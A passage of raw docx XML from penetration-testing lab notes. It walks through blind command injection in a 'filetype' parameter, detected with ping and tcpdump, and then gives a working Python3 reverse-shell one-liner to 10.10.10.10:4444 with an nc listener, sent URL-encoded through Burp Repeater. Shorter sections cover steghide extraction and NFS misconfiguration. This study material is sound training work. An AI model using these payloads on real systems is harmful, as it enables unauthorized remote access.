        <w:t xml:space="preserve">We also make sure to account for the spaces and any other special characters in our payload by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">URL-encoding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the command by selecting it and pressing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL+u</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside the BurpSuite repeater, so as to ensure the application properly processes it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="557"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The command (before URL-encoding) is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ping -c 3 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="557"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-c 3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" limits the number of ping requests to 3. Default runs it indefinitely</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="557"/>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10.10.10.10</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with your HOST IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F2B">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F2C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="557"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We attempt pasting our payload into all three of the parameters, one at a time, until we see the packets on our tcpdump. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This allows us to check which parameter is vulnerable to command injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F2D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F2E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1955800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="252" name="image172.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image172.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId295"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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2F2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="251"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We get the ICMP packets for the filetype parameter!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Successful blind command injection!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F30">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, we can use this command injection to get a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shell!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F32">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we have to set up a reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -nvlp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We proceed to try out different </w:t>
      </w:r>
      <w:hyperlink r:id="rId1039">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">payloads </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">until one gives us a callback to our listener. After some testing, we try out a Python3 payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export RHOST="</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">";export RPORT=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4444</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F36">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="666"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">URL-encode </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">it (select the text inside Repeater and then press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL+U</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) to ensure the application passes the request properly; the final POST request looks as follows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="666"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3746500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="331" name="image250.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image250.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId297"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3746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2F39">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="666"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace the RHOST and RPORT with the correct values for you. And remember that that RHOST is going to be your local IP! Not the target IP. Since this is a reverse shell. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F3A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F3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3C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_275oo99wfit5" w:id="419"/>
      <w:bookmarkEnd w:id="419"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steganography</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F3D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F3E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1040">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">MoneyBox</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we saw an example of steganography. We were given an image which seemed useless, but then in the website source code, we were given a "secret key" which ended up being the key used to extract information from an image. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F3F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">steghide extract -sf fileName.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F40">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will send output to a file called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">data.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since steghide can be used for both encryption and decryption, we have to specify extraction by using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">extract </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-sf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: This stands for "stego file", which is the file that may contain hidden data. It's the image (or audio) file that has potentially been embedded with hidden content.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F43">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F44">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F45">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F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47">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F48">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_n6ntkoqtzkpm" w:id="420"/>
      <w:bookmarkEnd w:id="420"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NFS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F49">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F4A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More can be seen in Tib3rius NFS Video</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F4B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F4C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NFS (Network File System)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a protocol that allows systems to share directories and files over a network as if they were locally mounted on the client machine. It's commonly used in Linux and Unix environments to enable file sharing between servers and clients.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F4D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F4E">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NFS has no protocol for authorization or authentication, making it a common pitfall for misconfiguration and therefore exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F4F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F50">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NFS (Network File System)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
